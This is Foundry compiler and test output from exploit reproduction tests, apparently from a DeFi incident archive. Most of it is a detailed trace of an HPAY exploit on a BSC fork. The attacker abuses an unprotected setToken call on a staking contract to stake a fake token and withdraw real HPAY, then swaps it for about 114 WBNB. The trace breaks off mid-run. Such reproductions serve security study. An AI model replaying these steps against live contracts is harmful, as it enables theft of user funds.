Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.65s (3.79ms CPU time)

Ran 1 test for src/test/2022-10/HPAY_exp.sol:ContractTest
[PASS] testExploit() (gas: 1713543)
Logs:
  [Start] Attacker WBNB balance before exploit: 0.000000000000000000
  [End] Attacker WBNB balance after exploit: 114.433555702427267533

Traces:
  [10882] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 22280853 [2.228e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(HPAY_TOKEN: [0xC75aa1Fa199EaC5adaBC832eA4522Cff6dFd521A], "HPAY_TOKEN")
    │   └─ ← [Return]
    ├─ [0] VM::label(WBNB_TOKEN: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB_TOKEN")
    │   └─ ← [Return]
    ├─ [0] VM::label(PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "PS_ROUTER")
    │   └─ ← [Return]
    ├─ [0] VM::label(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], "BONUS")
    │   └─ ← [Return]
    ├─ [0] VM::label(BONUS_IMPL: [0xE9bc03Ef08E991a99F1bd095a8590499931DcC30], "BONUS_IMPL")
    │   └─ ← [Return]
    ├─ [0] VM::label(WBNB_HPAY_PAIR: [0xa0A1E7571F938CC33daD497849F14A0c98B30FD0], "WBNB_HPAY_PAIR")
    │   └─ ← [Return]
    ├─ [0] VM::label(HPAY_RewardManager: [0xc16e351751e63A34F44908b065Fc8Be592D564dE], "HPAY_RewardManager")
    │   └─ ← [Return]
    ├─ [0] VM::label(HPAY_RewardManager_Impl: [0xf88daA7723f118EfB4416a0DfD129e005CA9166F], "HPAY_RewardManager_Impl")
    │   └─ ← [Return]
    ├─ [0] VM::label(HPAY_Fund: [0x45b10a3C39DE271D8edc23796970acF8832C20ff], "HPAY_Fund")
    │   └─ ← [Return]
    ├─ [0] VM::label(HPAY_FeeManager: [0x346abB57CfB43aD3Bb8210E3DD1dB12353160A0b], "HPAY_FeeManager")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1851743] ContractTest::testExploit()
    ├─ [2534] WBNB_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker WBNB balance before exploit", val: 0, decimals: 18)
    ├─ [25339] HPAY_TOKEN::approve(PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PS_ROUTER: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x9e278f814ad3ffbb7f027bc4ee8baeb253a935b12f796e4956a034ce49bfb589: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [736596] → new SHITCOIN@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─  storage changes:
    │   │   @ 3: 0 → 0x5348495420434f494e0000000000000000000000000000000000000000000012
    │   │   @ 4: 0 → 0x5348495400000000000000000000000000000000000000000000000000000008
    │   │   @ 5: 0 → 18
    │   └─ ← [Return] 3341 bytes of code
    ├─ [47129] SHITCOIN::mint(100000000000000000000000000 [1e26])
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 100000000000000000000000000 [1e26])
    │   ├─  storage changes:
    │   │   @ 0: 0 → 0x00000000000000000000000000000000000000000052b7d2dcc80cd2e4000000
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000052b7d2dcc80cd2e4000000
    │   └─ ← [Stop]
    ├─ [17660] BONUS::setToken(SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f])
    │   ├─ [10487] BONUS_IMPL::setToken(SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [delegatecall]
    │   │   ├─  storage changes:
    │   │   │   @ 161: 0x000000000000000000000000c75aa1fa199eac5adabc832ea4522cff6dfd521a → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   @ 162: 0x000000000000000000000000c75aa1fa199eac5adabc832ea4522cff6dfd521a → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [25078] SHITCOIN::approve(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xe9ad14eda13b6302da4de910bd87f9cc2a52f2c167063534c5b99382f29e194e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [824] SHITCOIN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 100000000000000000000000000 [1e26]
    ├─ [208650] BONUS::stake(100000000000000000000000000 [1e26])
    │   ├─ [207956] BONUS_IMPL::stake(100000000000000000000000000 [1e26]) [delegatecall]
    │   │   ├─ [26533] SHITCOIN::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 2000000000000000000000000 [2e24])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, value: 2000000000000000000000000 [2e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000052b7d2dcc80cd2e4000000 → 0x00000000000000000000000000000000000000000051104ea52a72f7a2000000
    │   │   │   │   @ 0xb27a9ffb8edd0a3cd63b36216af8bff9fcc6ef29872d237af2e9b3af15953a7a: 0 → 0x00000000000000000000000000000000000000000001a784379d99db42000000
    │   │   │   │   @ 0xe9ad14eda13b6302da4de910bd87f9cc2a52f2c167063534c5b99382f29e194e: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffe587bc8626624bdffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [26533] SHITCOIN::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 98000000000000000000000000 [9.8e25])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], value: 98000000000000000000000000 [9.8e25])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xe9ad14eda13b6302da4de910bd87f9cc2a52f2c167063534c5b99382f29e194e: 0xfffffffffffffffffffffffffffffffffffffffffffe587bc8626624bdffffff → 0xffffffffffffffffffffffffffffffffffffffffffad482d2337f32d1bffffff
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000051104ea52a72f7a2000000 → 0
    │   │   │   │   @ 0xeb91380cfcd9f02083d5c94a058823ec7043ddbb65f002e149ece6d42e875d5f: 0 → 0x00000000000000000000000000000000000000000051104ea52a72f7a2000000
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit Stake(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 98000000000000000000000000 [9.8e25])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3a296768a1c7d5922fa5c8e433e4ba9121ccecbd870b03db79fb7441aca26811: 0 → 71
    │   │   │   @ 0xc57b9430685832a777582fb4806f00cc812fa2479a6fc27ec3ac96ab1dc85bbc: 0 → 0x000000000000000000000000000000000000000000000000000000006376144f
    │   │   │   @ 155: 0x000000000000000000000000000000000000000000183a02413e35d4c9d44b08 → 0x000000000000000000000000000000000000000000694a50e668a8cc6bd44b08
    │   │   │   @ 0x05624e831aba84818284a4708546411a5bdc91733a23c767018f451503f24551: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 152: 0x00000000000000000000000000000000000000000000000000000000015372ef → 0x000000000000000000000000000000000000000000000000000000000153fa95
    │   │   │   @ 154: 0x000000000000000000000000000000000ffef8c0c384d485de662bbbe2de0d32 → 0x000000000000000000000000000000000fff44bf8ccace15668848666f85db03
    │   │   │   @ 468: 70 → 71
    │   │   │   @ 0x3e71c7b057ab5ff24767e24b4732f83c21b09f551c30a15e2969add56bd75a4e: 0 → 0x000000000000000000000000000000000fff44bf8ccace15668848666f85db03
    │   │   │   @ 0xb27a9ffb8edd0a3cd63b36216af8bff9fcc6ef29872d237af2e9b3af15953a7a: 0 → 0x00000000000000000000000000000000000000000001a784379d99db42000000
    │   │   │   @ 0x07cef64969864f83a28889fd83e7b851adea6aa7fd37f4216ea88565746cecfb: 0 → 0x00000000000000000000000000000000000000000051104ea52a72f7a2000000
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [0] VM::roll(22281853 [2.228e7])
    │   └─ ← [Return]
    ├─ [1560] BONUS::setToken(HPAY_TOKEN: [0xC75aa1Fa199EaC5adaBC832eA4522Cff6dFd521A])
    │   ├─ [887] BONUS_IMPL::setToken(HPAY_TOKEN: [0xC75aa1Fa199EaC5adaBC832eA4522Cff6dFd521A]) [delegatecall]
    │   │   ├─  storage changes:
    │   │   │   @ 162: 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f → 0x000000000000000000000000c75aa1fa199eac5adabc832ea4522cff6dfd521a
    │   │   │   @ 161: 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f → 0x000000000000000000000000c75aa1fa199eac5adabc832ea4522cff6dfd521a
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [403580] BONUS::withdraw(30000000000000000000000000 [3e25])
    │   ├─ [402907] BONUS_IMPL::withdraw(30000000000000000000000000 [3e25]) [delegatecall]
    │   │   ├─ [37274] HPAY_TOKEN::mint(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 1000878647941797139237 [1e21])
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], value: 1000878647941797139237 [1e21])
    │   │   │   ├─ [12413] HPAY_RewardManager::notifyBalanceUpdate(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 30404629833794213789798633 [3.04e25])
    │   │   │   │   ├─ [5216] HPAY_RewardManager_Impl::notifyBalanceUpdate(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 30404629833794213789798633 [3.04e25]) [delegatecall]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfde4df77e4a963dc8a257393ba70f82b2690c207c3b9d4e95464bd91cf8423f8: 0x00000000000000000000000000000000000000000019266e493562f1f3eb90e9 → 0x0000000000000000000000000000000000000000001926a48b30a65da7fde40e
    │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000006227ce2a0370c4f83a8285 → 0x0000000000000000000000000000000000000000006228046bfeb430ac4cd5aa
    │   │   │   └─ ← [Stop]
    │   │   ├─ [31049] HPAY_TOKEN::transfer(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 1000878647941797139237 [1e21])
    │   │   │   ├─ emit Transfer(from: BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], to: 0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, value: 1000878647941797139237 [1e21])
    │   │   │   ├─ [1913] HPAY_RewardManager::notifyBalanceUpdate(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 30405630712442155586937870 [3.04e25])
    │   │   │   │   ├─ [1216] HPAY_RewardManager_Impl::notifyBalanceUpdate(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 30405630712442155586937870 [3.04e25]) [delegatecall]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─ [8305] HPAY_RewardManager::notifyBalanceUpdate(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 56163744873280578071739 [5.616e22])
    │   │   │   │   ├─ [7608] HPAY_RewardManager_Impl::notifyBalanceUpdate(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 56163744873280578071739 [5.616e22]) [delegatecall]
    │   │   │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 57164623521222375210976 [5.716e22]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3687595841f4b9beca5fcfa2d7cea9359ce2f3a5e79dbde2f20e23aca7cc53da: 0x000000000000000000000000000000000000000000000be4a488a9f9a3352cbb → 0x000000000000000000000000000000000000000000000c1ae683ed6557477fe0
    │   │   │   │   @ 0xfde4df77e4a963dc8a257393ba70f82b2690c207c3b9d4e95464bd91cf8423f8: 0x0000000000000000000000000000000000000000001926a48b30a65da7fde40e → 0x00000000000000000000000000000000000000000019266e493562f1f3eb90e9
    │   │   │   └─ ← [Return] true
    │   │   ├─ [17049] HPAY_TOKEN::transfer(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 600000000000000000000000 [6e23])
    │   │   │   ├─ emit Transfer(from: BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], to: 0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, value: 600000000000000000000000 [6e23])
    │   │   │   ├─ [1913] HPAY_RewardManager::notifyBalanceUpdate(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 30404629833794213789798633 [3.04e25])
    │   │   │   │   ├─ [1216] HPAY_RewardManager_Impl::notifyBalanceUpdate(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 30404629833794213789798633 [3.04e25]) [delegatecall]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─ [4305] HPAY_RewardManager::notifyBalanceUpdate(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 57164623521222375210976 [5.716e22])
    │   │   │   │   ├─ [3608] HPAY_RewardManager_Impl::notifyBalanceUpdate(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 57164623521222375210976 [5.716e22]) [delegatecall]
    │   │   │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 657164623521222375210976 [6.571e23]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfde4df77e4a963dc8a257393ba70f82b2690c207c3b9d4e95464bd91cf8423f8: 0x00000000000000000000000000000000000000000019266e493562f1f3eb90e9 → 0x00000000000000000000000000000000000000000018a76038861b302ceb90e9
    │   │   │   │   @ 0x3687595841f4b9beca5fcfa2d7cea9359ce2f3a5e79dbde2f20e23aca7cc53da: 0x000000000000000000000000000000000000000000000c1ae683ed6557477fe0 → 0x000000000000000000000000000000000000000000008b28f73335271e477fe0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [256392] HPAY_TOKEN::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 29400000000000000000000000 [2.94e25])
    │   │   │   ├─ emit Transfer(from: BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 29400000000000000000000000 [2.94e25])
    │   │   │   ├─ [1913] HPAY_RewardManager::notifyBalanceUpdate(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 29804629833794213789798633 [2.98e25])
    │   │   │   │   ├─ [1216] HPAY_RewardManager_Impl::notifyBalanceUpdate(BONUS: [0xF8bC1434f3C5a7af0BE18c00C675F7B034a002F0], 29804629833794213789798633 [2.98e25]) [delegatecall]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─ [224548] HPAY_RewardManager::notifyBalanceUpdate(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ [223851] HPAY_RewardManager_Impl::notifyBalanceUpdate(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0) [delegatecall]
    │   │   │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 29400000000000000000000000 [2.94e25]
    │   │   │   │   │   ├─ [2633] HPAY_Fund::pendingRewards() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000088900bc094dadd899
    │   │   │   │   │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 29400000000000000000000000 [2.94e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 205: 4742 → 4950
    │   │   │   │   │   │   @ 0x9a22e9dbcabeca7d2f30d799811fb4ab802a60fdf6d7bde5675a16fc33b109b3: 0 → 0x0000000000000000000000000000000000000000000001ea5d13e60119a29a32
    │   │   │   │   │   │   @ 0x9a22e9dbcabeca7d2f30d799811fb4ab802a60fdf6d7bde5675a16fc33b109b5: 0 → 0x000000000000000000000000000000000000000000077448c0968cb9d52a9aa2
    │   │   │   │   │   │   @ 0x102a715caa4c9d97a5c81cd612aae64502aa7c2c35477e44d28878408a62d4fe: 0 → 45
    │   │   │   │   │   │   @ 0x102a715caa4c9d97a5c81cd612aae64502aa7c2c35477e44d28878408a62d4fd: 0 → 0x0000000000000000000000000000000000000000001851b1318cbc1717000000
    │   │   │   │   │   │   @ 204: 44 → 45
    │   │   │   │   │   │   @ 0x9a22e9dbcabeca7d2f30d799811fb4ab802a60fdf6d7bde5675a16fc33b109b6: 0 → 4950
    │   │   │   │   │   │   @ 207: 0x0000000000000000000000000000000000000000000001e9eb8830b2fbf12ffd → 0x000000000000000000000000000000000000000000000829edfa2ee6fe272fe6
    │   │   │   │   │   │   @ 201: 0x000000000000000000000000000000000000000000077448c0968cb9d52a9aa2 → 0x0000000000000000000000000000000000000000001fc5f9f22348d0ec2a9aa2
    │   │   │   │   │   │   @ 206: 0x00000000000000000000000000000000000000000000009a00bafd757d2c0895 → 0x00000000000000000000000000000000000000000000009a7246b2c39add72ca
    │   │   │   │   │   │   @ 0x9a22e9dbcabeca7d2f30d799811fb4ab802a60fdf6d7bde5675a16fc33b109b4: 0 → 4262
    │   │   │   │   │   │   @ 0x575f78df93eb84e00764fcde5a40c5b2b6dd9839d61c9debadc662a736c271b3: 0 → 0x00000000000000000000000000000000000000000000000000000000634e874f
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfde4df77e4a963dc8a257393ba70f82b2690c207c3b9d4e95464bd91cf8423f8: 0x00000000000000000000000000000000000000000018a76038861b302ceb90e9 → 0x0000000000000000000000000000000000000000000055af06f95f1915eb90e9
    │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x0000000000000000000000000000000000000000001851b1318cbc1717000000
    │   │   │   │   @ 0x575f78df93eb84e00764fcde5a40c5b2b6dd9839d61c9debadc662a736c271b3: 0 → 0x00000000000000000000000000000000000000000000000000000000634e874f
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit Unstake(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 29400000000000000000000000 [2.94e25])
    │   │   ├─  storage changes:
    │   │   │   @ 152: 0x000000000000000000000000000000000000000000000000000000000153fa95 → 0x000000000000000000000000000000000000000000000000000000000153fe7d
    │   │   │   @ 155: 0x000000000000000000000000000000000000000000694a50e668a8cc6bd44b08 → 0x000000000000000000000000000000000000000000507991a42ca4f38dd44b08
    │   │   │   @ 0x575f78df93eb84e00764fcde5a40c5b2b6dd9839d61c9debadc662a736c271b3: 0 → 0x00000000000000000000000000000000000000000000000000000000634e874f
    │   │   │   @ 154: 0x000000000000000000000000000000000fff44bf8ccace15668848666f85db03 → 0x000000000000000000000000000000000fff454074eda1ecefc7eb31f4cda3e1
    │   │   │   @ 0x07cef64969864f83a28889fd83e7b851adea6aa7fd37f4216ea88565746cecfb: 0x00000000000000000000000000000000000000000051104ea52a72f7a2000000 → 0x000000000000000000000000000000000000000000383f8f62ee6f1ec4000000
    │   │   │   @ 0x3e71c7b057ab5ff24767e24b4732f83c21b09f551c30a15e2969add56bd75a4e: 0x000000000000000000000000000000000fff44bf8ccace15668848666f85db03 → 0x000000000000000000000000000000000fff454074eda1ecefc7eb31f4cda3e1
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [930] HPAY_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 29400000000000000000000000 [2.94e25]
    ├─ [319658] PS_ROUTER::swapExactTokensForTokensSupportingFeeOnTransferTokens(29400000000000000000000000 [2.94e25], 0, [0xC75aa1Fa199EaC5adaBC832eA4522Cff6dFd521A, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1666090831 [1.666e9])
    │   ├─ [242337] HPAY_TOKEN::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], WBNB_HPAY_PAIR: [0xa0A1E7571F938CC33daD497849F14A0c98B30FD0], 29400000000000000000000000 [2.94e25])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: HPAY_TOKEN: [0xC75aa1Fa199EaC5adaBC832eA4522Cff6dFd521A], value: 1176000000000000000000000 [1.176e24])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: WBNB_HPAY_PAIR: [0xa0A1E7571F938CC33daD497849F14A0c98B30FD0], value: 28224000000000000000000000 [2.822e25])
    │   │   ├─ [17132] HPAY_RewardManager::notifyBalanceUpdate(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 29400000000000000000000000 [2.94e25])
    │   │   │   ├─ [16435] HPAY_RewardManager_Impl::notifyBalanceUpdate(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 29400000000000000000000000 [2.94e25]) [delegatecall]
    │   │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [633] HPAY_Fund::pendingRewards() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000088900bc094dadd899
    │   │   │   │   ├─ emit Withdraw(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 29400000000000000000000000 [2.94e25])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x102a715caa4c9d97a5c81cd612aae64502aa7c2c35477e44d28878408a62d4fd: 0x0000000000000000000000000000000000000000001851b1318cbc1717000000 → 0
    │   │   │   │   │   @ 207: 0x000000000000000000000000000000000000000000000829edfa2ee6fe272fe6 → 0x0000000000000000000000000000000000000000000001ea5d13e60119a29a32
    │   │   │   │   │   @ 0x9a22e9dbcabeca7d2f30d799811fb4ab802a60fdf6d7bde5675a16fc33b109b4: 4262 → 1000
    │   │   │   │   │   @ 201: 0x0000000000000000000000000000000000000000001fc5f9f22348d0ec2a9aa2 → 0x000000000000000000000000000000000000000000077448c0968cb9d52a9aa2
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [3913] HPAY_RewardManager::notifyBalanceUpdate(WBNB_HPAY_PAIR: [0xa0A1E7571F938CC33daD497849F14A0c98B30FD0], 38276009729219513316254676 [3.827e25])
    │   │   │   ├─ [3216] HPAY_RewardManager_Impl::notifyBalanceUpdate(WBNB_HPAY_PAIR: [0xa0A1E7571F938CC33daD497849F14A0c98B30FD0], 38276009729219513316254676 [3.827e25]) [delegatecall]
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ emit Transfer(from: HPAY_TOKEN: [0xC75aa1Fa199EaC5adaBC832eA4522Cff6dFd521A], to: 0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0, value: 1188774321402739570559930 [1.188e24])
    │   │   ├─ [162063] 0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0::processFee()
    │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0) [staticcall]
    │   │   │   │   └─ ← [Return] 1188774321402739570559930 [1.188e24]
    │   │   │   ├─ [930] HPAY_TOKEN::balanceOf(0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0) [staticcall]
    │   │   │   │   └─ ← [Return] 1188774321402739570559930 [1.188e24]
    │   │   │   ├─ [81739] HPAY_TOKEN::transfer(0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, 594387160701369785279965 [5.943e23])
    │   │   │   │   ├─ emit Transfer(from: 0xb1588cA2529fF4F1a8e21d6FE24bA6D0B6E000B0, to: 0x50720E10f47F21e59eB5C7a13Bd31f10A5b0F92B, value: 594387160701369785279965 [5.943e23])
